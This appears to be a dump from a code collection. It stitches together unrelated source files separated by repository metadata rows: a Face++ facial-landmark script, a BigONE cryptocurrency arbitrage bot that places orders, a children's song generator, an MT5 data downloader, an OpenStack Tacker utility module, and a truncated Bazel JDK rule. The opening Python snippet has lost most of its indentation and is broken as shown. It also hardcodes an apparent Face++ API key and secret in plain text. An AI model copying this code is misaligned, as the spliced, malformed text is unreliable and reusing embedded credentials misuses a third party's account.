MOUTH_POINTS = list(range(37, 55))
NOSE_POINTS = list(range(55, 65))
RIGHT_EYE_POINTS = list(range(65, 75))
RIGHT_BROW_POINTS = list(range(75, 83))
LEFT_FACE = list(range(0, 10)) + list(range(29, 34))
RIGHT_FACE = list(range(9, 19)) + list(range(75, 80))
JAW_END = 19
FACE_START = 0
FACE_END = 83
OVERLAY_POINTS = [
LEFT_FACE,
RIGHT_FACE,
JAW_POINTS,
]
def face_points(image):
points = []
txt = image + '.txt'
if os.path.isfile(txt):
with open(txt) as file:
for line in file:
points = line
elif os.path.isfile(image):
points = landmarks_by_face__(image)
with open(txt, 'w') as file:
file.write(str(points))
    faces = json.loads(points)['faces']
    if len(faces) == 0:
        # no face detected: return empty results instead of crashing on faces[0] below
        return np.matrix([]), [], 404
    err = 0
    matrix_list = np.matrix(matrix_marks(faces[0]['landmark']))
point_list = []
for p in matrix_list.tolist():
point_list.append((int(p[0]), int(p[1])))
return matrix_list, point_list, err
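# Usage sketch (illustrative; 'face.jpg' is a hypothetical path):
#   marks, points, err = face_points('face.jpg')
# Landmarks are fetched from Face++ once and then cached next to the image in 'face.jpg.txt'.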
def landmarks_by_face__(image):
url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
params = {
'api_key': 'ZBbrYf41rX5AJ2mVDEcdIERF7HOlpG6t',
'api_secret': 'G5qlzXk7Wd9iE6MlORYPRulJ2lihdt9U',
'return_landmark': 1,
}
file = {'image_file': open(image, 'rb')}
r = requests.post(url=url, files=file, data=params)
if r.status_code == requests.codes.ok:
return r.content.decode('utf-8')
else:
return r.content
def matrix_rectangle(left, top, width, height):
pointer = [
(left, top),
(left + width / 2, top),
(left + width - 1, top),
(left + width - 1, top + height / 2),
(left, top + height / 2),
(left, top + height - 1),
(left + width / 2, top + height - 1),
(left + width - 1, top + height - 1)
]
return pointer
def matrix_marks(res):
pointer = [
[res['contour_left1']['x'], res['contour_left1']['y']],
[res['contour_left2']['x'], res['contour_left2']['y']],
[res['contour_left3']['x'], res['contour_left3']['y']],
[res['contour_left4']['x'], res['contour_left4']['y']],
[res['contour_left5']['x'], res['contour_left5']['y']],
[res['contour_left6']['x'], res['contour_left6']['y']],
[res['contour_left7']['x'], res['contour_left7']['y']],
[res['contour_left8']['x'], res['contour_left8']['y']],
[res['contour_left9']['x'], res['contour_left9']['y']],
[res['contour_chin']['x'], res['contour_chin']['y']],
[res['contour_right9']['x'], res['contour_right9']['y']],
[res['contour_right8']['x'], res['contour_right8']['y']],
[res['contour_right7']['x'], res['contour_right7']['y']],
[res['contour_right6']['x'], res['contour_right6']['y']],
[res['contour_right5']['x'], res['contour_right5']['y']],
[res['contour_right4']['x'], res['contour_right4']['y']],
[res['contour_right3']['x'], res['contour_right3']['y']],
[res['contour_right2']['x'], res['contour_right2']['y']],
[res['contour_right1']['x'], res['contour_right1']['y']],
[res['left_eye_bottom']['x'], res['left_eye_bottom']['y']],
[res['left_eye_center']['x'], res['left_eye_center']['y']],
[res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']],
[res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']],
[res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']],
[res['left_eye_pupil']['x'], res['left_eye_pupil']['y']],
[res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']],
[res['left_eye_top']['x'], res['left_eye_top']['y']],
[res['left_eye_upper_left_quarter']['x'], res['left_eye_upper_left_quarter']['y']],
[res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']],
[res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']],
[res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']],
[res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']],
[res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']],
[res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']],
[res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']],
[res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']],
[res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']],
[res['mouth_left_corner']['x'], res['mouth_left_corner']['y']],
[res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']],
[res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']],
[res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']],
[res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']],
[res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']],
[res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']],
[res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']],
[res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']],
[res['mouth_right_corner']['x'], res['mouth_right_corner']['y']],
[res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']],
[res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']],
[res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']],
[res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']],
[res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']],
[res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']],
[res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']],
[res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']],
[res['nose_contour_left1']['x'], res['nose_contour_left1']['y']],
[res['nose_contour_left2']['x'], res['nose_contour_left2']['y']],
[res['nose_contour_left3']['x'], res['nose_contour_left3']['y']],
[res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']],
[res['nose_contour_right1']['x'], res['nose_contour_right1']['y']],
[res['nose_contour_right2']['x'], res['nose_contour_right2']['y']],
[res['nose_contour_right3']['x'], res['nose_contour_right3']['y']],
[res['nose_left']['x'], res['nose_left']['y']],
[res['nose_right']['x'], res['nose_right']['y']],
[res['nose_tip']['x'], res['nose_tip']['y']],
[res['right_eye_bottom']['x'], res['right_eye_bottom']['y']],
[res['right_eye_center']['x'], res['right_eye_center']['y']],
[res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']],
[res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']],
[res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']],
[res['right_eye_pupil']['x'], res['right_eye_pupil']['y']],
[res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']],
[res['right_eye_top']['x'], res['right_eye_top']['y']],
[res['right_eye_upper_left_quarter']['x'], res['right_eye_upper_left_quarter']['y']],
[res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']],
[res['right_eyebrow_left_corner']['x'], res['right_eyebrow_left_corner']['y']],
[res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']],
[res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']],
[res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']],
[res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']],
[res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']],
[res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']],
[res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']],
]
return pointer
| 47.308511 | 103 | 0.619744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,608 | 0.518102 |
bcf7f47be4d0d789e4869009ef9f2f68c5ab3b33 | 5,383 | py | Python | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | # coding: utf-8
from bigone import BigOneDog
from common import gen_logger
import logging
import time
import json
def strategy_eth_big_bnc_eth(dog):
"""
    Forward: buy BIG/ETH -> sell BIG/BNC -> buy ETH/BNC
    Reverse: sell ETH/BNC -> buy BIG/BNC -> sell BIG/ETH
    :param dog: implementation of BigOneDog
    :return: forward yield rate, reverse yield rate
"""
big_eth_data = dog.get_order_book('BIG-ETH')
big_bnc_data = dog.get_order_book('BIG-BNC')
eth_bnc_data = dog.get_order_book('ETH-BNC')
    print('BIG-ETH')
    print('best ask', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount'])
    print('best bid', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount'])
    print('BIG-BNC')
    print('best ask', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount'])
    print('best bid', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount'])
    print('ETH-BNC')
    print('best ask', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
    print('best bid', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
# positive transaction
pos_anc = 0.999*0.999*0.999*\
((1 / (float(big_eth_data['asks'][0]['price'])))
* float(big_bnc_data['bids'][0]['price']) )
pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1
# negative transaction
neg_anc = 0.999 * 0.999 * 0.999 * \
(float(eth_bnc_data['bids'][0]['price'])
/ float(big_bnc_data['asks'][0]['price'])
* float(big_eth_data['asks'][0]['price']))
neg_anc = neg_anc / 1 - 1
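    # Explanatory note (not in the original): each 0.999 factor models a 0.1% trading fee per leg,
    # so three legs give 0.999**3. pos_anc / neg_anc are net round-trip returns; > 0 means profitable.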
flag = False
amt = 2.0
if float(big_eth_data['asks'][0]['amount']) >= amt:
if float(big_bnc_data['bids'][0]['amount']) >= amt:
if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']):
flag = True
msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:"
if pos_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "利润空间大于1%"
if flag is False:
result = "{},{}".format(result,"量不足, 放弃本次套利 0")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "{},{}".format(result,"执行本次套利 1")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt)))
print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt)))
print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'],
str(amt * float(big_eth_data['asks'][0]['price']))))
# dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0')
# dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0')
# dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'],
# str(2.0 * float(big_eth_data['asks'][0]['price'])))
return True
    if neg_anc < 0.01:
        result = "profit margin below 1%, skipping this arbitrage 0"
    else:
        result = "profit margin above 1%, executing this arbitrage 1"
    logger.info("Expected profit for this [reverse arbitrage: sell ETH/BNC -> buy BIG/BNC -> sell BIG/ETH]: {0:.2f}%, {1}".format(neg_anc*100,result))
return False
# return pos_anc, neg_anc
def strategy_eth_bnc(dog):
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('ETH-BNC')
    print('best ask', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
    print('best bid', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1
print(anc)
if anc > 0.02:
r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' )
bid_order_id = r['order_id']
r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' )
ask_order_id = r['order_id']
return anc, anc
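# Explanatory note (not in the original): strategy_eth_bnc is a simple spread-capture probe --
# when the ETH-BNC bid/ask spread exceeds 2% it places a 0.01 ETH buy one tick above the best bid
# and a 0.01 ETH sell one tick below the best ask, aiming for both to fill inside the spread.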
if __name__ == '__main__':
gen_logger('bigonetest')
logger = logging.getLogger("bigone")
with open("PRIVATE_KEY.json",'r') as f:
private_key = json.load(f)["key"]
dog = BigOneDog(private_key)
# strategy_eth_bnc(dog)
# dog.get_orders("ETH-BNC",'10')
# r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d")
# print(r)
# r = dog.get_orders('ETH-BNC','10')
# print(r)
while True:
flag = strategy_eth_big_bnc_eth(dog)
if flag is True:
break
else:
print("休眠10秒")
print("")
time.sleep(10)
# break
# pos_anc, neg_anc = strategy_eth_bnc(dog)
# if pos_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result))
#
# if neg_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
#
# print("休眠10秒")
# print("")
# time.sleep(10)
| 35.886667 | 112 | 0.546907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,653 | 0.458441 |
bcf9bd066aefdc4f6abca126693e2677662eb927 | 1,542 | py | Python | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | 1 | 2018-07-02T13:54:49.000Z | 2018-07-02T13:54:49.000Z | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | null | null | null | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | 3 | 2016-05-28T15:13:02.000Z | 2021-04-10T06:04:25.000Z | # -*- coding: utf-8 -*-
import os,sys
from PyQt4 import QtGui,QtCore
dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'histdata'))
sys.path.append(dataRoot)
import dataCenter as dataCenter
from data.mongodb.DataSourceMongodb import Mongodb
import datetime as dt
def getSymbols():
    #mid 1) the data below was obtained by copy-pasting from Excel
codesStr = """
XAGUSD
"""
    #mid 2) split the string into a list with split(); by default this strips \n and all whitespace.
#codeList = ['000021.SZ','000022.SZ']
codeList = [code.split('.')[0] for code in codesStr.split()]
return codeList
def subMain():
DC = dataCenter.dataCenter()
remoteDataSourceType = 'mt5'
localStorageType = 'mongodb'
periodType = 'D'
timeStart = dt.datetime(2000,10,20)
timeEnd = dt.datetime.now()
# 1)get codes form eastmoney
codeList = getSymbols()
# 2)download history data
dataDict = DC.downloadHistData(providerType=remoteDataSourceType,storageType=localStorageType,periodType=periodType,
codeList=codeList,timeFrom = timeStart,timeTo = timeEnd)
if __name__ == '__main__':
#app = QtGui.QApplication(sys.argv)
#mid-----------------------------------------------------------------------------------------------------------------------------
subMain()
#mid-----------------------------------------------------------------------------------------------------------------------------
#sys.exit(app.exec_()) | 37.609756 | 133 | 0.527237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 648 | 0.403487 |
bcfb7330e40f9b79f2ab184f143d401951828548 | 2,513 | py | Python | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 116 | 2015-10-18T02:57:08.000Z | 2022-03-15T04:09:18.000Z | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 6 | 2016-11-07T22:15:54.000Z | 2021-05-09T06:13:08.000Z | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 166 | 2015-10-20T15:31:52.000Z | 2021-11-12T08:39:49.000Z | # Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.sol_refactored import objects
LOG = logging.getLogger(__name__) # not used at the moment
def get_inst(context, inst_id):
inst = objects.VnfInstanceV2.get_by_id(context, inst_id)
if inst is None:
raise sol_ex.VnfInstanceNotFound(inst_id=inst_id)
return inst
def get_inst_all(context):
return objects.VnfInstanceV2.get_all(context)
def inst_href(inst_id, endpoint):
return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id)
def make_inst_links(inst, endpoint):
links = objects.VnfInstanceV2_Links()
self_href = inst_href(inst.id, endpoint)
links.self = objects.Link(href=self_href)
if inst.instantiationState == 'NOT_INSTANTIATED':
links.instantiate = objects.Link(href=self_href + "/instantiate")
else: # 'INSTANTIATED'
links.terminate = objects.Link(href=self_href + "/terminate")
# TODO(oda-g): add when the operation supported
# links.scale = objects.Link(href = self_href + "/scale")
# etc.
return links
# see IETF RFC 7396
def json_merge_patch(target, patch):
if isinstance(patch, dict):
if not isinstance(target, dict):
target = {}
for key, value in patch.items():
if value is None:
if key in target:
del target[key]
else:
target[key] = json_merge_patch(target.get(key), value)
return target
else:
return patch
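# Illustrative example of the RFC 7396 semantics above (not from the source):
#   json_merge_patch({"a": 1, "b": {"c": 2}}, {"b": {"c": None, "d": 3}})
#   -> {"a": 1, "b": {"d": 3}}   # None deletes a key; nested dicts merge recursively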
def select_vim_info(vim_connection_info):
# NOTE: It is assumed that vimConnectionInfo has only one item
# at the moment. If there are multiple items, it is uncertain
# which item is selected.
for vim_info in vim_connection_info.values():
return vim_info
| 32.217949 | 78 | 0.68842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,039 | 0.41345 |
4c040273405e24f9a3249bb42b05984c6988f41a | 3,445 | py | Python | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | #Create the pre-defined song values and empty variables...Correct names not used so each starting letter would be unique
numbers = (1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 )
letters = ['a ','b ','c ','d ','e ','f ','g ','h ','i ','j ','k ','l ','m ','n ','o ','p ','q ','r ']
roman = ['I ', 'II ', 'III ', 'IV ', 'V ', 'VI ', 'VII ', 'VIII ', 'IX ', 'X ', 'XI ', 'XII ', 'XIII ', 'XIV ', 'XV ', 'XVI ', 'XVII ', 'XVIII']
military = ['alpha ', 'bravo ', 'charlie ', 'delta ', 'echo ', 'foxtrot ', 'golf ', 'hotel ', 'india ', 'juliet ', 'kilo ', 'lima ', 'mike ', 'november ', 'oscar ', 'papa ', 'quebec ', 'romeo ']
german = ['eins', 'zwei', 'drei', 'vier', 'fünf', 'sechs', 'sieben', 'acht', 'neun', 'zehn', 'elf', 'zwölf', 'dreizehn', 'vierzehn', 'fünfzehn', 'sechzehn', 'siebzehn', 'achtzehn']
pi = ['3 ','point ','1 ','4 ','1 ','5 ','9 ','2 ','6 ','5 ','3 ','5 ','8 ','9 ','7 ','9 ','3 ','2 ']
##Build morse code sequences
t = 'dot'
s = 'dash'
m1 = t, s, s, s, s
m2 = t, t, s, s, s
m3 = t, t, t, s, s
m4 = t, t, t, t, s
m5 = t, t, t, t, t
m6 = s, t, t, t, t
m7 = s, s, t, t, t
m8 = s, s, s, t, t
m9 = s, s, s, s, t
m0 = s, s, s, s, s
code = [m1, m2, m3, m4, m5, m6, m7, m8, m9, m1 + m0, m1 + m1, m1 + m2, m1 + m3, m1 + m4, m1 + m5, m1 + m6, m1 + m7, m1 + m8]
##Other ideas: piglatin, japanese, spanish, prime, tau, e, ...
##NEED TO ADD INVALID ENTRY CATCHES
print("Hello, let's sing a song that everybody loves!\n")
sing = 'y'
while sing == 'y':
user = []
    variation = input ("Please input what variation you wish to perform by entering 'numbers', 'letters', 'roman', 'military', 'pi', 'german', 'code', or 'user' to make your own song: \n").lower().strip()
##Seeming silly switching of strings to list types
if variation == "numbers" or variation == "n":
variation = numbers
elif variation == "letters" or variation == "l":
variation = letters
elif variation == "roman" or variation == "r":
variation = roman
elif variation == "military" or variation == "m":
variation = military
elif variation == "pi" or variation == "p":
variation = pi
elif variation == "german" or variation == "g":
variation = german
elif variation == "code" or variation == "c":
variation = code
elif variation == "user" or variation == "u":
while len(user) < 18:
user.append(input ("Enter a word: "))
#User input to select the song pattern
pattern = input ("\nNow please tell me what pattern to use by entering 'forward', 'backward', 'even', or 'odd':\n")
print ("\nHere we go: \n\n")
    #Assemble the song as plain strings so the printed output is easier to read
    song1 = "Oh, there are "
    song2 = " wheels on a big rig truck!"
    a = song1 + " ".join(str(i).strip() for i in variation[::]) + song2
    b = song1 + " ".join(str(i).strip() for i in variation[::-1]) + song2
    c = song1 + " ".join(str(i).strip() for i in variation[::2]) + song2
    d = song1 + " ".join(str(i).strip() for i in variation[1::2]) + song2
    ##Use pattern.startswith()?...Also, might be better to separate forward/backward and even/odd choices.
if pattern == 'forward' or pattern == 'f':
print (a)
elif pattern == 'backward' or pattern == 'b':
print (b)
elif pattern == 'odd' or pattern == 'o':
print (c)
elif pattern == 'even' or pattern == 'e':
print (d)
sing = input('\n\nWould you like to sing it again? (y/n) ').lower()
## This is the end of the while loop
else:
print ("\nOK, Goodbye!")
| 37.445652 | 204 | 0.54688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,663 | 0.482309 |
4c0a433f8f2a1c5fe05d98092959a53a97b1beea | 8,767 | bzl | Python | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 16,989 | 2015-09-01T19:57:15.000Z | 2022-03-31T23:54:00.000Z | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 12,562 | 2015-09-01T09:06:01.000Z | 2022-03-31T22:26:20.000Z | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 3,707 | 2015-09-02T19:20:01.000Z | 2022-03-31T17:06:14.000Z | # Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for importing and registering a local JDK."""
load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain")
def _detect_java_version(repository_ctx, java_bin):
properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr
# This returns an indented list of properties separated with newlines:
# " java.vendor.url.bug = ... \n"
# " java.version = 11.0.8\n"
# " java.version.date = 2020-11-05\"
strip_properties = [property.strip() for property in properties_out.splitlines()]
version_property = [property for property in strip_properties if property.startswith("java.version = ")]
if len(version_property) != 1:
return None
version_value = version_property[0][len("java.version = "):]
parts = version_value.split(".")
major = parts[0]
if len(parts) == 1:
return major
elif major == "1": # handles versions below 1.8
minor = parts[1]
return minor
return major
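# Illustrative parses (example values, not from the source): "java.version = 11.0.8" -> "11";
# "java.version = 1.8.0_292" -> "8" (the pre-9 "1.x" scheme maps to its minor number).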
def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]):
"""Defines a java_runtime target together with Java runtime and compile toolchain definitions.
Java runtime toolchain is constrained by flag --java_runtime_version having
value set to either name or version argument.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation. This requires a different configuration for JDK8
than the newer versions.
Args:
name: name of the target.
java_home: Path to the JDK.
version: Version of the JDK.
runtime_name: name of java_runtime target if it already exists.
visibility: Visibility that will be applied to the java runtime target
"""
if runtime_name == None:
runtime_name = name
native.java_runtime(
name = runtime_name,
java_home = java_home,
visibility = visibility,
)
native.config_setting(
name = name + "_name_setting",
values = {"java_runtime_version": name},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_version_setting",
values = {"java_runtime_version": version},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_name_version_setting",
values = {"java_runtime_version": name + "_" + version},
visibility = ["//visibility:private"],
)
native.alias(
name = name + "_settings_alias",
actual = select({
name + "_name_setting": name + "_name_setting",
name + "_version_setting": name + "_version_setting",
"//conditions:default": name + "_name_version_setting",
}),
visibility = ["//visibility:private"],
)
native.toolchain(
name = "runtime_toolchain_definition",
target_settings = [":%s_settings_alias" % name],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = runtime_name,
)
if version == "8":
default_java_toolchain(
name = name + "_toolchain_java8",
configuration = JVM8_TOOLCHAIN_CONFIGURATION,
source_version = version,
target_version = version,
java_runtime = runtime_name,
)
elif type(version) == type("") and version.isdigit() and int(version) > 8:
for version in range(8, int(version) + 1):
default_java_toolchain(
name = name + "_toolchain_java" + str(version),
source_version = str(version),
target_version = str(version),
java_runtime = runtime_name,
)
# else version is not recognized and no compilation toolchains are predefined
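# Illustrative use of the macro above (hypothetical values, typically in a BUILD file):
#   local_java_runtime(
#       name = "openjdk11",
#       java_home = "/usr/lib/jvm/java-11-openjdk",
#       version = "11",
#   )
# This registers a runtime toolchain matched by --java_runtime_version=openjdk11 (or =11)
# and defines compile toolchains for --java_language_version 8..11.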
def _local_java_repository_impl(repository_ctx):
"""Repository rule local_java_repository implementation.
Args:
repository_ctx: repository context
"""
java_home = repository_ctx.attr.java_home
java_home_path = repository_ctx.path(java_home)
if not java_home_path.exists:
        fail(('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' +
              "does not exist.") % (java_home, str(java_home_path)))
repository_ctx.file(
"WORKSPACE",
"# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" +
"workspace(name = \"{name}\")\n".format(name = repository_ctx.name),
)
extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else ""
java_bin = java_home_path.get_child("bin").get_child("java" + extension)
if not java_bin.exists:
# Java binary does not exist
repository_ctx.file(
"BUILD.bazel",
_NOJDK_BUILD_TPL.format(
local_jdk = repository_ctx.name,
java_binary = "bin/java" + extension,
java_home = java_home,
),
False,
)
return
# Detect version
version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin)
# Prepare BUILD file using "local_java_runtime" macro
build_file = ""
if repository_ctx.attr.build_file != None:
build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file))
runtime_name = '"jdk"' if repository_ctx.attr.build_file else None
local_java_runtime_macro = """
local_java_runtime(
name = "%s",
runtime_name = %s,
java_home = "%s",
version = "%s",
)
""" % (repository_ctx.name, runtime_name, java_home, version)
repository_ctx.file(
"BUILD.bazel",
'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' +
build_file +
local_java_runtime_macro,
)
# Symlink all files
for file in repository_ctx.path(java_home).readdir():
repository_ctx.symlink(file, file.basename)
# Build file template, when JDK does not exist
_NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule")
fail_rule(
name = "jdk",
header = "Auto-Configuration Error:",
message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " +
"PATH or specify Java from remote repository (e.g. " +
"--java_runtime_version=remotejdk_11")
)
config_setting(
name = "localjdk_setting",
values = {{"java_runtime_version": "{local_jdk}"}},
visibility = ["//visibility:private"],
)
toolchain(
name = "runtime_toolchain_definition",
target_settings = [":localjdk_setting"],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = ":jdk",
)
'''
_local_java_repository_rule = repository_rule(
implementation = _local_java_repository_impl,
local = True,
configure = True,
attrs = {
